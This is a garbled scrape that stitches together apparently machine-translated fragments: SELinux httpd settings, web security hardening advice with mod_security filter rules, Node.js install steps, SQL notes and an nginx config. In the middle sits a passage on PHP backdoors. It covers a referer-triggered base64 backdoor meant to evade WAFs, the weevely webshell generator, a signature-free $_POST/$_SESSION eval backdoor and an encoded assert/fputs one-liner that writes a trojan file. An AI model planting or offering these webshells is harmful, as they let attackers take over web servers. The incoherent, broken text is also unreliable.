--> off
httpd_can_network_memcache --> off
httpd_can_network_relay --> off
httpd_can_sendmail --> off
httpd_dbus_avahi --> on
httpd_enable_cgi --> on
httpd_enable_ftp_server --> off
httpd_enable_homedirs --> off
httpd_execmem --> off
httpd_read_user_content --> off
httpd_setrlimit --> off
httpd_ssi_exec --> off
httpd_tmp_exec --> off
httpd_tty_comm --> on
httpd_unified --> on
httpd_use_cifs --> off
httpd_use_gpg --> off
httpd_use_nfs --> off

To disable Apache CGI support, enter:
# setsebool -P httpd_enable_cgi off
Security: impregnable as a fortress (固若金汤)
XSS (Cross Site Script, cross-site scripting): there are two main prevention measures, sanitization and HttpOnly cookies.
Injection attacks: SQL injection and OS injection. SQL injection prevention measures: sanitization and parameter binding (prepared statements).
CSRF (Cross Site Request Forgery, cross-site request forgery): the primary defense is to identify the requester, mainly with form tokens, verification codes, and referer checks.
Web application firewall.
Tokens can be automatic
a secure operating system, fix vulnerabilities in time, and install anti-virus software and a firewall. Guard against viruses and backdoors. Set firewall policies, establish a DDoS defense system, use an attack detection system, and apply subnet isolation.
Application system security: when developing a program, use the correct method at the code level to solve known common problems. Prevent cross-site scripting (XSS), injection attacks, cross-site request forgery (CSRF), error message leakage, HTML comments, file uploads,
For details, see the Red Hat SELinux Guide.
#21: Install mod_security
ModSecurity is an open-source web application engine for intrusion detection and prevention. Installing mod_security can protect Apache and PHP applications from XSS and other attacks:
## A few examples ##
# Do not allow opening files in /etc/
SecFilter /etc/
# Stop SQL injection
SecFilter "delete[[:space:]]+from"
SecFilter "select.+from"
#22: If possible, run Apache/PHP in a chroot jail
Running
. This includes infrastructure security, application system security, data security, and so on. Infrastructure security: hardware procurement, operating system, and network environment security. Generally, buy high-quality products through formal channels, choose a secure operating system, repair vulnerabilities in time, install anti-virus software and a firewall, and guard against viruses and backdoors. Set up firewall policies, a DDoS defense system, an attack detection system, subnet isolation and other m
uploads, path traversal, and more. You can also use a web application firewall (for example ModSecurity), security vulnerability scanning and other measures to enhance application-level security. Data security: storage security (storing data on reliable devices, with real-time and scheduled backups), preservation security (encrypting important information, selecting suitable personnel for complex preservation and detection, etc.), tra
A verification code is a poor user experience, so do not use one unless necessary. A common current practice is to require a verification code only after a form submission fails repeatedly within a short period, which gives a better user experience.
Addendum: a firewall is an important guarantee of web security, and ModSecurity is the leader among open-source web firewalls. The enterprise firewall should be set up with
on Fedora
Node.js is included in the base repository of Fedora, so you can use yum to install Node.js on Fedora:
$ sudo yum install npm
If you want to install the latest version of Node.js, you can build it from source as follows:
$ sudo yum groupinstall 'Development Tools'
$ wget http://nodejs.org/dist/node-latest.tar.gz
$ tar xvfz node-latest.tar.gz
$ cd node-v0.10.21 (replace the version with your own)
$ ./configure
$ make
$ sudo make install
Install Node.js on CentOS or RHEL
To insta
Editor: "In nine to 12 months, it will be widely used." This is a long time on the speed-first Internet.
Currently, attackers do not need a deep understanding of network protocols: using attack software that is everywhere on the Internet, they can change a website's homepage, obtain the administrator password, destroy the entire website's data, and carry out other attacks. The network-layer data generated during these attacks is no different from normal data. Traditional firewalls have no
select * from table; commit; After executing these two SQL statements, it is as if no data had been inserted. If we use a session-level temporary table, the content of the temporary table still exists even after a commit; it is cleared only when the session is disconnected. Therefore, in actual development, we use different types of temporary tables for this combination of scenarios. During the development of the proposal system, I used a se
($ch, $options); echo curl_exec($ch);
Uses HTTP_REFERER in the HTTP request to run base64-encoded code to achieve the backdoor effect. Generally, a WAF applies loose or no referer checking, so bypassing the WAF works well.
PHP webshell generation tool weevely
Weevely is free software for generating PHP webshells. It can be used to simulate a connection shell similar to telnet. weevely is usually used to exploit web progr
without features:
Assigns the content of $_POST['code'] to $_SESSION['thecode'] and then executes $_SESSION['thecode']. The highlight is that there is no signature: if you check the code with a scanning tool, no alarm is triggered.
Super hidden PHP backdoor:
Only the GET function constitutes a Trojan;Usage:? A = assert B =$ {fputs % 28 fopen % 28base64_decode % 28Yy5waHA % 29, w % 29, base64_decode % bytes % 29% 29 };
After execution, the current directory generates c. php one-
:9020 weight=1;
}
sendfile off;
#tcp_nopush on;
server_names_hash_bucket_size 128;
## start: timeouts ##
client_body_timeout 10;
client_header_timeout 10;
keepalive_timeout 80;
send_timeout 10;
keepalive_requests 10;
## end: timeouts ##
#gzip on;
server {
    # This is critical: it is the port Nginx listens on
    listen 8080;
    server_name localhost;
    #charset koi8-r;
    #access_log logs/host.access.log main;
    # for naxsi: remove the "single" line for learn mode, or the "# Lin